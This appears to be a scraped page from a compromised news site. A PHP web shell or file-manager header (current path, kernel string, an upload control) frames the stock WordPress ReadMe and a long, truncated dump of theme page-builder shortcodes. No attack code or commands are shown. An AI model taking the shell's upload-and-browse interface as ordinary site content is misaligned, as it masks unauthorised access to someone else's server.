Current Path : /www/wwwroot/twbonews.com/

Linux vultr.guest 3.10.0-1160.25.1.el7.x86_64 #1 SMP Wed Apr 28 21:49:45 UTC 2021 x86_64

Upload File :
Current File : /www/wwwroot/twbonews.com/input.php
<!DOCTYPE html>
<html lang="en">
<head>
	<meta name="viewport" content="width=device-width" />
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<title>WordPress &#8250; ReadMe</title>
	<link rel="stylesheet" href="wp-admin/css/install.css?ver=20100228" type="text/css" />
</head>
<body>
<h1 id="logo">
	<a href="https://wordpress.org/"><img alt="WordPress" src="wp-admin/images/wordpress-logo.png" /></a>
</h1>
<p style="text-align: center">Semantic Personal Publishing Platform</p>

<h2>First Things First</h2>
<p>Welcome. WordPress is a very special project to me. Every developer and contributor adds something unique to the mix, and together we create something beautiful that I&#8217;m proud to be a part of. Thousands of hours have gone into WordPress, and we&#8217;re dedicated to making it better every day. Thank you for making it part of your world.</p>
<p style="text-align: right">&#8212; Matt Mullenweg</p>

<h2>Installation: Famous 5-minute install</h2>
<ol>
	<li>Unzip the package in an empty directory and upload everything.</li>
	<li>Open <span class="file"><a href="wp-admin/install.php">wp-admin/install.php</a></span> in your browser. It will take you through the process to set up a <code>wp-config.php</code> file with your database connection details.
		<ol>
			<li>If for some reason this doesn&#8217;t work, don&#8217;t worry. It doesn&#8217;t work on all web hosts. Open up <code>wp-config-sample.php</code> with a text editor like WordPad or similar and fill in your database connection details.</li>
			<li>Save the file as <code>wp-config.php</code> and upload it.</li>
			<li>Open <span class="file"><a href="wp-admin/install.php">wp-admin/install.php</a></span> in your browser.</li>
		</ol>
	</li>
	<li>Once the configuration file is set up, the installer will set up the tables needed for your site. If there is an error, double check your <code>wp-config.php</code> file, and try again. If it fails again, please go to the <a href="https://wordpress.org/support/forums/">WordPress support forums</a> with as much data as you can gather.</li>
	<li><strong>If you did not enter a password, note the password given to you.</strong> If you did not provide a username, it will be <code>admin</code>.</li>
	<li>The installer should then send you to the <a href="wp-login.php">login page</a>. Sign in with the username and password you chose during the installation. If a password was generated for you, you can then click on &#8220;Profile&#8221; to change the password.</li>
</ol>

<h2>Updating</h2>
<h3>Using the Automatic Updater</h3>
<ol>
	<li>Open <span class="file"><a href="wp-admin/update-core.php">wp-admin/update-core.php</a></span> in your browser and follow the instructions.</li>
	<li>You wanted more, perhaps? That&#8217;s it!</li>
</ol>

<h3>Updating Manually</h3>
<ol>
	<li>Before you update anything, make sure you have backup copies of any files you may have modified such as <code>index.php</code>.</li>
	<li>Delete your old WordPress files, saving ones you&#8217;ve modified.</li>
	<li>Upload the new files.</li>
	<li>Point your browser to <span class="file"><a href="wp-admin/upgrade.php">/wp-admin/upgrade.php</a>.</span></li>
</ol>

<h2>Migrating from other systems</h2>
<p>WordPress can <a href="https://wordpress.org/support/article/importing-content/">import from a number of systems</a>. First you need to get WordPress installed and working as described above, before using <a href="wp-admin/import.php">our import tools</a>.</p>

<h2>System Requirements</h2>
<ul>
	<li><a href="https://secure.php.net/">PHP</a> version <strong>5.6.20</strong> or greater.</li>
	<li><a href="https://www.mysql.com/">MySQL</a> version <strong>5.0</strong> or greater.</li>
</ul>

<h3>Recommendations</h3>
<ul>
	<li><a href="https://secure.php.net/">PHP</a> version <strong>7.4</strong> or greater.</li>
	<li><a href="https://www.mysql.com/">MySQL</a> version <strong>5.7</strong> or greater OR <a href="https://mariadb.org/">MariaDB</a> version <strong>10.2</strong> or greater.</li>
	<li>The <a href="https://httpd.apache.org/docs/2.2/mod/mod_rewrite.html">mod_rewrite</a> Apache module.</li>
	<li><a href="https://wordpress.org/news/2016/12/moving-toward-ssl/">HTTPS</a> support.</li>
	<li>A link to <a href="https://wordpress.org/">wordpress.org</a> on your site.</li>
</ul>

<h2>Online Resources</h2>
<p>If you have any questions that aren&#8217;t addressed in this document, please take advantage of WordPress&#8217; numerous online resources:</p>
<dl>
	<dt><a href="https://codex.wordpress.org/">The WordPress Codex</a></dt>
		<dd>The Codex is the encyclopedia of all things WordPress. It is the most comprehensive source of information for WordPress available.</dd>
	<dt><a href="https://wordpress.org/news/">The WordPress Blog</a></dt>
		<dd>This is where you&#8217;ll find the latest updates and news related to WordPress. Recent WordPress news appears in your administrative dashboard by default.</dd>
	<dt><a href="https://planet.wordpress.org/">WordPress Planet</a></dt>
		<dd>The WordPress Planet is a news aggregator that brings together posts from WordPress blogs around the web.</dd>
	<dt><a href="https://wordpress.org/support/forums/">WordPress Support Forums</a></dt>
		<dd>If you&#8217;ve looked everywhere and still can&#8217;t find an answer, the support forums are very active and have a large community ready to help. To help them help you be sure to use a descriptive thread title and describe your question in as much detail as possible.</dd>
	<dt><a href="https://make.wordpress.org/support/handbook/appendix/other-support-locations/introduction-to-irc/">WordPress <abbr>IRC</abbr> (Internet Relay Chat) Channel</a></dt>
		<dd>There is an online chat channel that is used for discussion among people who use WordPress and occasionally support topics. The above wiki page should point you in the right direction. (<a href="https://web.libera.chat/#wordpress">irc.libera.chat #wordpress</a>)</dd>
</dl>

<h2>Final Notes</h2>
<ul>
	<li>If you have any suggestions, ideas, or comments, or if you (gasp!) found a bug, join us in the <a href="https://wordpress.org/support/forums/">Support Forums</a>.</li>
	<li>WordPress has a robust plugin <abbr>API</abbr> (Application Programming Interface) that makes extending the code easy. If you are a developer interested in utilizing this, see the <a href="https://developer.wordpress.org/plugins/">Plugin Developer Handbook</a>. You shouldn&#8217;t modify any of the core code.</li>
</ul>

<h2>Share the Love</h2>
<p>WordPress has no multi-million dollar marketing campaign or celebrity sponsors, but we do have something even better&#8212;you. If you enjoy WordPress please consider telling a friend, setting it up for someone less knowledgeable than yourself, or writing the author of a media article that overlooks us.</p>

<p>WordPress is the official continuation of <a href="http://cafelog.com/">b2/caf&#233;log</a>, which came from Michel V. The work has been continued by the <a href="https://wordpress.org/about/">WordPress developers</a>. If you would like to support WordPress, please consider <a href="https://wordpress.org/donate/">donating</a>.</p>

<h2>License</h2>
<p>WordPress is free software, and is released under the terms of the <abbr>GPL</abbr> (GNU General Public License) version 2 or (at your option) any later version. See <a href="license.txt">license.txt</a>.</p>

</body>
</html>

台灣BO新聞網|即時播報熱點|全民最愛資訊網

Home

[tdc_zone type=”tdc_content” tdc_css=”eyJhbGwiOnsiZGlzcGxheSI6IiJ9fQ==”][vc_row tdc_css=”eyJhbGwiOnsiZGlzcGxheSI6IiJ9fQ==” row_hide_on_pagination=”yes”][vc_column tdc_css=”eyJhbGwiOnsiZGlzcGxheSI6IiJ9fQ==”][td_block_trending_now mt_title_tag=”h2″ navigation=”manual” tdc_css=”eyJhbGwiOnsibWFyZ2luLXRvcCI6IjI0IiwibWFyZ2luLWJvdHRvbSI6IjI0IiwiZGlzcGxheSI6IiJ9LCJwb3J0cmFpdCI6eyJtYXJnaW4tdG9wIjoiMTYiLCJtYXJnaW4tYm90dG9tIjoiMTYiLCJkaXNwbGF5IjoiIn0sInBvcnRyYWl0X21heF93aWR0aCI6MTAxOCwicG9ydHJhaXRfbWluX3dpZHRoIjo3NjgsInBob25lIjp7Im1hcmdpbi10b3AiOiIxMiIsIm1hcmdpbi1ib3R0b20iOiIxMiIsImRpc3BsYXkiOiIifSwicGhvbmVfbWF4X3dpZHRoIjo3Njd9″ f_article_font_size=”eyJwb3J0cmFpdCI6IjEzIn0=” limit=”3″][td_block_big_grid_flex_5 meta_info_vert=”content-vert-bottom” image_zoom=”yes” show_author2=”none” show_date2=”none” modules_category=”above” overlay_general=”eyJ0eXBlIjoiZ3JhZGllbnQiLCJjb2xvcjEiOiJyZ2JhKDAsMCwwLDApIiwiY29sb3IyIjoicmdiYSgwLDAsMCwwLjcpIiwibWl4ZWRDb2xvcnMiOlt7ImNvbG9yIjoicmdiYSgwLDAsMCwwKSIsInBlcmNlbnRhZ2UiOjYwfV0sImNzcyI6ImJhY2tncm91bmQ6IC13ZWJraXQtbGluZWFyLWdyYWRpZW50KDBkZWcscmdiYSgwLDAsMCwwLjcpLHJnYmEoMCwwLDAsMCkgNjAlLHJnYmEoMCwwLDAsMCkpO2JhY2tncm91bmQ6IGxpbmVhci1ncmFkaWVudCgwZGVnLHJnYmEoMCwwLDAsMC43KSxyZ2JhKDAsMCwwLDApIDYwJSxyZ2JhKDAsMCwwLDApKTsiLCJjc3NQYXJhbXMiOiIwZGVnLHJnYmEoMCwwLDAsMC43KSxyZ2JhKDAsMCwwLDApIDYwJSxyZ2JhKDAsMCwwLDApIn0=” image_height2=”eyJwaG9uZSI6IjE4MHB4IiwicG9ydHJhaXQiOiIxNzZweCIsImxhbmRzY2FwZSI6IjIzNHB4In0=” modules_gap=”eyJwaG9uZSI6IjMifQ==” meta_padding2=”eyJwaG9uZSI6IjAgMjBweCAxNHB4IiwicG9ydHJhaXQiOiIxOXB4IDE4cHggMTRweCJ9″ meta_padding1=”eyJwaG9uZSI6IjE1cHggMTBweCAyMHB4IDIwcHgiLCJsYW5kc2NhcGUiOiIyMiIsInBvcnRyYWl0IjoiMTVweCJ9″ cat_bg_hover=”#4db2ec” review_stars=”#fff” modules_category_margin2=”eyJwb3J0cmFpdCI6IjBweCAwcHggNHB4IDBweCJ9″ modules_category_margin1=”eyJwb3J0cmFpdCI6IjBweCAwcHggN3B4IDBweCJ9″ art_title1=”eyJwb3J0cmFpdCI6IjBweCAwcHggNnB4IDBweCIsImFsbCI6IjAgMCAxMnB4IiwicGhvbmUiOiIwIDAgNnB4IDAifQ==” show_author3=”none” show_date3=”none” image_size=”” image_size2=”” image_size3=”” image_width1=”eyJwaG9uZSI6IjEwMCJ9″ image_height1=”eyJsYW5kc2NhcGUiOiI0MTRweCIsInBvcnRyYWl0IjoiMzEycHgiLCJwaG9uZSI6IjMyMHB4In0=” image_width2=”eyJwaG9uZSI6IjgwIn0=” image_width3=”eyJwaG9uZSI6IjgwIn0=” image_height3=”eyJwaG9uZSI6IjE4MHB4IiwibGFuZHNjYXBlIjoiMTc2cHgiLCJwb3J0cmFpdCI6IjEzMnB4In0=” sort=”” meta_width1=”eyJhbGwiOiI5MCUiLCJwaG9uZSI6IjEwMCUifQ==” meta_width2=”eyJhbGwiOiI4NSUiLCJwaG9uZSI6IjEwMCUifQ==” post_ids=”” tdc_css=”eyJsYW5kc2NhcGUiOnsibWFyZ2luLXJpZ2h0IjoiLTIyIiwibWFyZ2luLWxlZnQiOiItMjIiLCJ3aWR0aCI6ImF1dG8iLCJkaXNwbGF5IjoiYmxvY2sifSwibGFuZHNjYXBlX21heF93aWR0aCI6MTE0MCwibGFuZHNjYXBlX21pbl93aWR0aCI6MTAxOSwicG9ydHJhaXQiOnsibWFyZ2luLXJpZ2h0IjoiLTE0IiwibWFyZ2luLWxlZnQiOiItMTQiLCJ3aWR0aCI6ImF1dG8iLCJkaXNwbGF5IjoiYmxvY2sifSwicG9ydHJhaXRfbWF4X3dpZHRoIjoxMDE4LCJwb3J0cmFpdF9taW5fd2lkdGgiOjc2OH0=” meta_padding3=”eyJwaG9uZSI6IjAgMjBweCAxNHB4In0=”][/vc_column][/vc_row][vc_row row_hide_on_pagination=”yes”][vc_column width=”2/3″][td_flex_block_3 modules_category=”image” modules_on_row=”eyJhbGwiOiI1MCUiLCJsYW5kc2NhcGUiOiIxMDAlIn0=” modules_category1=”image” show_cat2=”none” show_com2=”none” show_author2=”none” columns=”eyJhbGwiOiI1MCUiLCJwaG9uZSI6IjEwMCUifQ==” columns_gap=”eyJsYW5kc2NhcGUiOiI0MCIsInBvcnRyYWl0IjoiMjAifQ==” image_width2=”eyJwb3J0cmFpdCI6IjM1In0=” custom_title=”最新資訊” header_color=”#f9c100″ header_text_color=”#000000″ td_ajax_filter_type=”” ajax_pagination=”next_prev” sort=”popular” image_size2=”” f_header_font_transform=”uppercase” category_id=”” td_ajax_filter_ids=”” show_review2=”none” show_audio2=”none” f_ex1_font_size=”eyJwb3J0cmFpdCI6IjExIn0=” f_ex1_font_line_height=”eyJwb3J0cmFpdCI6IjEuNiJ9″ modules_space2=”eyJhbGwiOiIyNiIsInBvcnRyYWl0IjoiMjAifQ==” modules_space1=”eyJhbGwiOiIwIiwicGhvbmUiOiIyMSJ9″ meta_padding2=”eyJwb3J0cmFpdCI6IjAgMCAwIDEzcHgifQ==” video_icon2=”24″ image_size=”td_485x360″][td_flex_block_4 modules_category=”image” modules_on_row=”eyJhbGwiOiI1MCUiLCJsYW5kc2NhcGUiOiIxMDAlIn0=” modules_category1=”image” show_cat2=”none” show_com2=”none” show_author2=”none” columns=”50%” columns_gap=”eyJsYW5kc2NhcGUiOiI0MCIsInBvcnRyYWl0IjoiMjAifQ==” image_width2=”eyJwb3J0cmFpdCI6IjM1In0=” modules_space1=”eyJwaG9uZSI6IjIxIiwiYWxsIjoiMjEifQ==” limit=”6″ show_excerpt1=”” show_excerpt2=”none” custom_title=”國際新聞” header_color=”#3a863d” td_ajax_filter_type=”” ajax_pagination=”next_prev” modules_divider1=”” category_id=”35″ image_size3=”” f_header_font_transform=”uppercase” td_ajax_filter_ids=”” sort=”” category_ids=”” f_ex1_font_size=”eyJwb3J0cmFpdCI6IjExIn0=” f_ex1_font_line_height=”eyJwb3J0cmFpdCI6IjEuNiJ9″ modules_space2=”eyJhbGwiOiIyNiIsInBvcnRyYWl0IjoiMjAifQ==” meta_padding2=”eyJwb3J0cmFpdCI6IjAgMCAwIDEzcHgifQ==” video_icon2=”24″ image_size=”td_485x360″][td_flex_block_1 modules_on_row=”eyJhbGwiOiIzMy4zMzMzMzMzMyUiLCJwaG9uZSI6IjEwMCUifQ==” limit=”3″ modules_category=”image” show_btn=”none” show_excerpt=”none” ajax_pagination=”next_prev” sort=”” category_id=”33″ f_title_font_size=”eyJwb3J0cmFpdCI6IjEzIiwiYWxsIjoiMTUiLCJwaG9uZSI6IjE0In0=” f_title_font_line_height=”eyJhbGwiOiIxLjMiLCJwaG9uZSI6IjEuNCJ9″ modules_gap=”eyJhbGwiOiIyMCIsInBvcnRyYWl0IjoiMTUiLCJwaG9uZSI6IjE1In0=” show_com=”none” show_date=”eyJhbGwiOiJub25lIiwicGhvbmUiOiJpbmxpbmUtYmxvY2sifQ==” show_author=”none” image_height=”70″ f_title_font_weight=”500″ all_modules_space=”eyJhbGwiOiIyMCIsImxhbmRzY2FwZSI6IjIwIiwicG9ydHJhaXQiOiIxNSIsInBob25lIjoiMjYifQ==” custom_title=”本地資訊” header_color=”#5d7987″ image_floated=”eyJwaG9uZSI6ImZsb2F0X2xlZnQifQ==” image_width=”eyJwaG9uZSI6IjMwIn0=” meta_info_align=”” meta_margin=”eyJwaG9uZSI6IjAgMCAwIDE2cHgifQ==” meta_padding=”eyJwaG9uZSI6IjAifQ==” video_icon=”eyJwb3J0cmFpdCI6IjI0IiwicGhvbmUiOiIyNCJ9″ image_size=”td_485x360″][td_flex_block_3 modules_category=”image” modules_on_row=”eyJhbGwiOiI1MCUiLCJsYW5kc2NhcGUiOiIxMDAlIn0=” modules_category1=”image” show_cat2=”none” show_com2=”none” show_author2=”none” columns=”eyJhbGwiOiI1MCUiLCJwaG9uZSI6IjEwMCUifQ==” columns_gap=”eyJsYW5kc2NhcGUiOiI0MCIsInBvcnRyYWl0IjoiMjAifQ==” image_width2=”eyJwb3J0cmFpdCI6IjM1In0=” modules_space1=”eyJhbGwiOiIwIiwicGhvbmUiOiIyMSJ9″ ajax_pagination=”next_prev” custom_title=”科技創新板塊” header_color=”#e42719″ category_id=”53″ td_ajax_filter_ids=”” td_ajax_filter_type=”” image_size2=”” image_alignment2=”6″ f_header_font_transform=”uppercase” sort=”” category_ids=”” f_ex1_font_size=”eyJwb3J0cmFpdCI6IjExIn0=” f_ex1_font_line_height=”eyJwb3J0cmFpdCI6IjEuNiJ9″ modules_space2=”eyJhbGwiOiIyNiIsInBvcnRyYWl0IjoiMjAifQ==” meta_padding2=”eyJwb3J0cmFpdCI6IjAgMCAwIDEzcHgifQ==” video_icon2=”24″ image_size=”td_485x360″][/vc_column][vc_column width=”1/3″ is_sticky=”yes”][td_block_social_counter custom_title=”Stay Connected” facebook=”#” twitter=”#” youtube=”#” style=”style4 td-social-colored” f_header_font_transform=”uppercase” manual_count_facebook=”16985″ manual_count_twitter=”2458″ manual_count_youtube=”61453″][td_block_ad_box spot_title=”- Advertisement -” spot_id=”sidebar” media_size_image_height=”500″ media_size_image_width=”600″ spot_img_horiz=”content-horiz-center” tdc_css=”eyJhbGwiOnsibWFyZ2luLWJvdHRvbSI6IjQ4IiwiZGlzcGxheSI6IiJ9fQ==” spot_img_width=”eyJwaG9uZSI6IjMwMCJ9″][td_flex_block_1 modules_on_row=”50%” modules_category=”image” show_btn=”none” show_excerpt=”none” ajax_pagination=”next_prev” sort=”” category_id=”” f_title_font_size=”eyJwb3J0cmFpdCI6IjEyIiwiYWxsIjoiMTMiLCJwaG9uZSI6IjE0In0=” f_title_font_line_height=”1.3″ modules_gap=”eyJhbGwiOiIyMCIsInBvcnRyYWl0IjoiMTUiLCJwaG9uZSI6IjIwIn0=” show_com=”none” show_date=”none” show_author=”none” image_height=”70″ f_title_font_weight=”500″ all_modules_space=”eyJhbGwiOiIyMiIsImxhbmRzY2FwZSI6IjIwIiwicG9ydHJhaXQiOiIxNSIsInBob25lIjoiMTUifQ==” limit=”4″ meta_padding=”eyJwb3J0cmFpdCI6IjhweCAwIDAgMCIsImFsbCI6IjdweCAwIDAifQ==” custom_title=”Make it modern” image_size=”td_218x150″ image_alignment=”eyJhbGwiOjUwLCJwaG9uZSI6IjExIn0=” f_header_font_transform=”uppercase” video_icon=”eyJhbGwiOiIyNCIsInBvcnRyYWl0IjoiMjAifQ==”][td_flex_block_4 modules_category=”image” modules_on_row=”eyJhbGwiOiI1MCUiLCJsYW5kc2NhcGUiOiIxMDAlIn0=” modules_category1=”image” show_cat2=”none” show_com2=”none” show_author2=”none” columns=”100%” columns_gap=”eyJsYW5kc2NhcGUiOiI0MCIsInBvcnRyYWl0IjoiMjgifQ==” image_width2=”eyJwb3J0cmFpdCI6IjM1In0=” modules_space1=”eyJwaG9uZSI6IjIxIiwiYWxsIjoiMjEifQ==” limit=”3″ show_excerpt1=”” show_excerpt2=”none” custom_title=”Latest Reviews” image_height1=”72″ category_id=”” image_size3=”” f_header_font_transform=”uppercase” f_ex1_font_size=”eyJwb3J0cmFpdCI6IjExIn0=” f_ex1_font_line_height=”eyJwb3J0cmFpdCI6IjEuNiJ9″ meta_padding2=”eyJwb3J0cmFpdCI6IjAgMCAwIDEzcHgifQ==” video_icon2=”24″ image_size=”td_485x360″][/vc_column][/vc_row][vc_row tdc_css=”eyJhbGwiOnsiZGlzcGxheSI6IiJ9LCJwaG9uZSI6eyJwYWRkaW5nLXRvcCI6IjAiLCJkaXNwbGF5IjoiIn0sInBob25lX21heF93aWR0aCI6NzY3fQ==” row_hide_on_pagination=”yes”][vc_column width=”2/3″][td_flex_block_1 modules_on_row=”” custom_title=”政治要聞” image_floated=”float_left” image_width=”eyJhbGwiOiIzMiIsInBob25lIjoiMzAifQ==” image_height=”eyJhbGwiOiI3MCIsInBvcnRyYWl0IjoiOTAifQ==” meta_padding=”eyJhbGwiOiIwIDAgMCAyNnB4IiwicGhvbmUiOiIwIDAgMCAxNnB4IiwicG9ydHJhaXQiOiIwIDAgMCAyMHB4In0=” show_btn=”none” show_cat=”none” f_title_font_size=”eyJhbGwiOiIyMiIsInBvcnRyYWl0IjoiMTciLCJwaG9uZSI6IjE0In0=” f_title_font_line_height=”eyJhbGwiOiIxLjMiLCJwaG9uZSI6IjEuNCJ9″ show_excerpt=”eyJwaG9uZSI6Im5vbmUifQ==” f_title_font_weight=”eyJwb3J0cmFpdCI6IjQwMCIsInBob25lIjoiNTAwIn0=” show_author=”eyJwb3J0cmFpdCI6Im5vbmUifQ==” f_ex_font_size=”eyJwb3J0cmFpdCI6IjExIn0=” f_ex_font_line_height=”eyJwb3J0cmFpdCI6IjEuNiJ9″ art_excerpt=”eyJwb3J0cmFpdCI6IjE2cHggMCAwIDAifQ==” category_id=”31″ f_header_font_transform=”uppercase” category_ids=”” all_modules_space=”eyJhbGwiOiIzNiIsInBvcnRyYWl0IjoiMzAiLCJwaG9uZSI6IjI2In0=” video_icon=”eyJwaG9uZSI6IjI0In0=” image_size=”td_485x360″][/vc_column][vc_column width=”1/3″ is_sticky=”yes”][td_block_ad_box spot_title=”- Advertisement -” spot_id=”sidebar” media_size_image_height=”500″ media_size_image_width=”600″ spot_img_horiz=”content-horiz-center” tdc_css=”eyJhbGwiOnsibWFyZ2luLWJvdHRvbSI6IjQ4IiwiZGlzcGxheSI6IiJ9fQ==” spot_img_width=”eyJwaG9uZSI6IjMwMCJ9″][td_flex_block_5 art_title_pos=”top” info_pos=”top” art_excerpt_pos=”bottom” modules_category=”image” btn_pos=”bottom” limit=”1″ custom_title=”Holiday Recipes” header_color=”#8954c1″ show_btn=”none” meta_padding=”0 0 17px” art_excerpt=”14px 0 0″ meta_padding2=”0″ f_title_font_size=”eyJwb3J0cmFpdCI6IjE3In0=” f_title_font_line_height=”eyJwb3J0cmFpdCI6IjEuMyJ9″ category_id=”” image_size=”td_485x360″ f_header_font_transform=”uppercase” ajax_pagination=”next_prev” f_ex_font_size=”eyJwb3J0cmFpdCI6IjExIn0=” f_ex_font_line_height=”eyJwb3J0cmFpdCI6IjEuNiJ9″][/vc_column][/vc_row][vc_row row_hide_on_pagination=”yes”][vc_column][td_block_ad_box tdc_css=”eyJhbGwiOnsibWFyZ2luLWJvdHRvbSI6IjQ4IiwiZGlzcGxheSI6IiJ9fQ==” spot_id=”” spot_img_all=”18″ spot_img_horiz=”content-horiz-center” spot_title=”Advertisment” spot_img_mob=”19″ spot_img_width=”eyJwaG9uZSI6IjMwMCJ9″ spot_img_all_width_attribute=”728″ spot_img_all_height_attribute=”90″ spot_img_mob_width_attribute=”300″ spot_img_mob_height_attribute=”250″ spot_url=”https://www.google.com” spot_img_alt_attribute=”Google search engine”][/vc_column][/vc_row][vc_row tdc_css=”eyJhbGwiOnsiZGlzcGxheSI6IiJ9LCJwaG9uZSI6eyJwYWRkaW5nLXRvcCI6IjAiLCJkaXNwbGF5IjoiIn0sInBob25lX21heF93aWR0aCI6NzY3fQ==” row_hide_on_pagination=”yes” gap=”eyJwb3J0cmFpdCI6IjEwIn0=”][vc_column width=”1/3″][td_flex_block_4 modules_category=”image” modules_on_row=”eyJhbGwiOiI1MCUiLCJsYW5kc2NhcGUiOiIxMDAlIn0=” modules_category1=”image” show_cat2=”none” show_com2=”none” show_author2=”none” columns=”100%” columns_gap=”eyJsYW5kc2NhcGUiOiI0MCIsInBvcnRyYWl0IjoiMjgifQ==” image_width2=”eyJwb3J0cmFpdCI6IjM1IiwiYWxsIjoiMjUiLCJwaG9uZSI6IjMwIn0=” modules_space1=”eyJwaG9uZSI6IjI2IiwiYWxsIjoiMjEifQ==” limit=”4″ show_excerpt1=”none” show_excerpt2=”none” show_com1=”none” show_cat1=”none” meta_info_align1=”image” meta_padding1=”0 17px 17px” f_title1_font_size=”eyJhbGwiOiIxNyIsInBob25lIjoiMTcifQ==” f_title1_font_weight=”700″ title_txt=”#ffffff” author_txt=”#ffffff” color_overlay=”eyJ0eXBlIjoiZ3JhZGllbnQiLCJjb2xvcjEiOiJyZ2JhKDAsMCwwLDApIiwiY29sb3IyIjoicmdiYSgwLDAsMCwwLjcpIiwibWl4ZWRDb2xvcnMiOltdLCJjc3MiOiJiYWNrZ3JvdW5kOiAtd2Via2l0LWxpbmVhci1ncmFkaWVudCgwZGVnLHJnYmEoMCwwLDAsMC43KSxyZ2JhKDAsMCwwLDApKTtiYWNrZ3JvdW5kOiBsaW5lYXItZ3JhZGllbnQoMGRlZyxyZ2JhKDAsMCwwLDAuNykscmdiYSgwLDAsMCwwKSk7IiwiY3NzUGFyYW1zIjoiMGRlZyxyZ2JhKDAsMCwwLDAuNykscmdiYSgwLDAsMCwwKSJ9″ image_height2=”eyJhbGwiOiI3NSIsInBob25lIjoiNzAifQ==” f_title2_font_line_height=”1.4″ f_title2_font_size=”eyJhbGwiOiIxMyIsInBob25lIjoiMTQifQ==” custom_title=”WRC Racing” header_color=”#0b7cc0″ image_height1=”68″ category_id=”” f_title1_font_line_height=”1.1″ image_size=”td_485x360″ modules_divider_color1=”” modules_divider_color2=”” modules_space2=”eyJhbGwiOiIyMSIsInBvcnRyYWl0IjoiMjAiLCJwaG9uZSI6IjI2In0=” f_header_font_transform=”uppercase” title_txt_hover=”#ffffff” meta_padding2=”eyJwb3J0cmFpdCI6IjAgMCAwIDEzcHgifQ==” video_icon2=”24″][/vc_column][vc_column width=”1/3″][td_flex_block_4 modules_category=”image” modules_on_row=”eyJhbGwiOiI1MCUiLCJsYW5kc2NhcGUiOiIxMDAlIn0=” modules_category1=”image” show_cat2=”none” show_com2=”none” show_author2=”none” columns=”100%” columns_gap=”eyJsYW5kc2NhcGUiOiI0MCIsInBvcnRyYWl0IjoiMjgifQ==” image_width2=”eyJwb3J0cmFpdCI6IjM1IiwiYWxsIjoiMjUiLCJwaG9uZSI6IjMwIn0=” modules_space1=”eyJwaG9uZSI6IjI2IiwiYWxsIjoiMjEifQ==” limit=”4″ show_excerpt1=”none” show_excerpt2=”none” show_com1=”none” show_cat1=”none” meta_info_align1=”image” meta_padding1=”0 17px 17px” f_title1_font_size=”17″ f_title1_font_line_height=”1.1″ f_title1_font_weight=”700″ title_txt=”#ffffff” author_txt=”#ffffff” color_overlay=”eyJ0eXBlIjoiZ3JhZGllbnQiLCJjb2xvcjEiOiJyZ2JhKDAsMCwwLDApIiwiY29sb3IyIjoicmdiYSgwLDAsMCwwLjcpIiwibWl4ZWRDb2xvcnMiOltdLCJjc3MiOiJiYWNrZ3JvdW5kOiAtd2Via2l0LWxpbmVhci1ncmFkaWVudCgwZGVnLHJnYmEoMCwwLDAsMC43KSxyZ2JhKDAsMCwwLDApKTtiYWNrZ3JvdW5kOiBsaW5lYXItZ3JhZGllbnQoMGRlZyxyZ2JhKDAsMCwwLDAuNykscmdiYSgwLDAsMCwwKSk7IiwiY3NzUGFyYW1zIjoiMGRlZyxyZ2JhKDAsMCwwLDAuNykscmdiYSgwLDAsMCwwKSJ9″ image_height2=”eyJhbGwiOiI3NSIsInBob25lIjoiNzAifQ==” f_title2_font_line_height=”1.4″ f_title2_font_size=”eyJhbGwiOiIxMyIsInBob25lIjoiMTQifQ==” custom_title=”Health & Fitness” category_id=”” image_height1=”68″ modules_divider_color1=”” modules_divider_color2=”” modules_space2=”eyJhbGwiOiIyMSIsInBvcnRyYWl0IjoiMjAiLCJwaG9uZSI6IjI2In0=” f_header_font_transform=”uppercase” title_txt_hover=”#ffffff” meta_padding2=”eyJwb3J0cmFpdCI6IjAgMCAwIDEzcHgifQ==” video_icon2=”24″ image_size=”td_485x360″][/vc_column][vc_column width=”1/3″][td_flex_block_1 modules_on_row=”” image_size=”” image_floated=”” show_btn=”none” show_excerpt=”none” show_com=”none” show_author=”eyJwb3J0cmFpdCI6ImlubGluZS1ibG9jayJ9″ show_cat=”none” limit=”3″ f_title_font_size=”eyJhbGwiOiIxNyIsInBvcnRyYWl0IjoiMTQifQ==” f_title_font_line_height=”1.4″ f_title_font_weight=”eyJhbGwiOiI1MDAiLCJwb3J0cmFpdCI6IjcwMCJ9″ all_modules_space=”” category_id=”” show_date=”” modules_divider=”dashed” modules_divider_color=”#f4f4f4″ meta_info_align=”” tdc_css=”eyJhbGwiOnsiZGlzcGxheSI6IiJ9fQ==” modules_category=”above” meta_info_horiz=”content-horiz-center” art_title=”8px 0 5px 0″ custom_title=”Architecture” f_header_font_transform=”uppercase” meta_padding=”0 0 20px 0″ hide_image=”yes”][/vc_column][/vc_row][vc_row tdc_css=”eyJhbGwiOnsiZGlzcGxheSI6IiJ9fQ==” row_hide_on_pagination=”yes”][vc_column][td_block_big_grid_flex_1 grid_layout=”3″ image_height=”eyJhbGwiOiI3MCIsInBvcnRyYWl0IjoiODAiLCJwaG9uZSI6IjUwIn0=” image_zoom=”yes” meta_info_vert=”content-vert-center” modules_category=”above” overlay_general=”eyJ0eXBlIjoiZ3JhZGllbnQiLCJjb2xvcjEiOiJyZ2JhKDAsMCwwLDApIiwiY29sb3IyIjoicmdiYSgwLDAsMCwwLjcpIiwibWl4ZWRDb2xvcnMiOlt7ImNvbG9yIjoicmdiYSgwLDAsMCwwLjcpIiwicGVyY2VudGFnZSI6MTAwfV0sImNzcyI6ImJhY2tncm91bmQ6IC13ZWJraXQtbGluZWFyLWdyYWRpZW50KDBkZWcscmdiYSgwLDAsMCwwLjcpLHJnYmEoMCwwLDAsMC43KSAxMDAlLHJnYmEoMCwwLDAsMCkpO2JhY2tncm91bmQ6IGxpbmVhci1ncmFkaWVudCgwZGVnLHJnYmEoMCwwLDAsMC43KSxyZ2JhKDAsMCwwLDAuNykgMTAwJSxyZ2JhKDAsMCwwLDApKTsiLCJjc3NQYXJhbXMiOiIwZGVnLHJnYmEoMCwwLDAsMC43KSxyZ2JhKDAsMCwwLDAuNykgMTAwJSxyZ2JhKDAsMCwwLDApIn0=” review_stars=”#fff” f_title_font_size=”eyJwb3J0cmFpdCI6IjE0IiwicGhvbmUiOiIyMCIsImFsbCI6IjE4In0=” f_title_font_line_height=”eyJwaG9uZSI6IjI0cHgiLCJhbGwiOiIxLjMifQ==” meta_info_horiz=”content-horiz-center” lightsky=”yes” category_id=”” f_title_font_transform=”uppercase” f_title_font_weight=”300″ cat_bg=”#222222″ overlay_h_general=”rgba(77,178,236,0.2)” cat_bg_hover=”#ffffff” cat_txt=”#ffffff” cat_txt_hover=”#222222″ 